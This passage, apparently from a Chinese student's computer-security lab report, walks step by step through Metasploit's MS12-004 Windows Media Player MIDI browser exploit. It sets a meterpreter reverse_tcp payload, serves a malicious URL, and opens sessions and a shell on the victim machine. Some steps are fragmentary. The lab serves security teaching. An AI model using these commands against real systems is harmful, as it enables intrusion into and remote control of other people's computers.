打开任务管理器: 使用taskmgr命令
*第四部分:渗透时使用meterpreter工具。
浏览器漏洞MS12-004
Windows Media Player是系统的多媒体播放组件。
WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。 受影响系统:
Microsoft Windows XP Professional Microsoft Windows XP Home Edition Microsoft Windows Vista
Microsoft Windows Storage Server 2003 Microsoft Windows Server 2008
Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows 7
启动msfconsole
search ms12_004
搜索不到该模块
得到相关结果为windows/browser/ms12_004_midi 使用它
use windows/browser/ms12_004_midi
查看 payloads
show payloads
set payload windows/meterpreter/reverse_tcp
查看相关的选项options
show options
有SRVHOST SRVPORT SSL及SSL version为模块的参数 有EXITFUNC和LHOST 及LPORT作为payload的参数。 还有target 设置
设置SRVHOST 和LHOST 都设置为本地IP set SRVHOST LHOST 可设置为 0
set URLPATH 渗透准备 exploit 则列出一URL
如:using 暂时渗透到此
在当对方机器 使用时,sessions产生
使用sessions 来获知session sessions -i 1
直接将session 转到shell中
创建至meterpreter
使用命令查看当前的meterpreter 可操作的内容。
试使用相关的进程管理工具对被渗透计算机上的进行管理!
实验心得:
通过实验学习到了如何利用metasploit入侵其他电脑,可以在知道对方ip地址的情况下主动渗透,也可以诱使用户访问恶意网页控制用户系统,由此可见漏洞被不法之徒利用之后会对用户造成巨大的损失,让我意识到学好计算机系统安全这门课的重要性。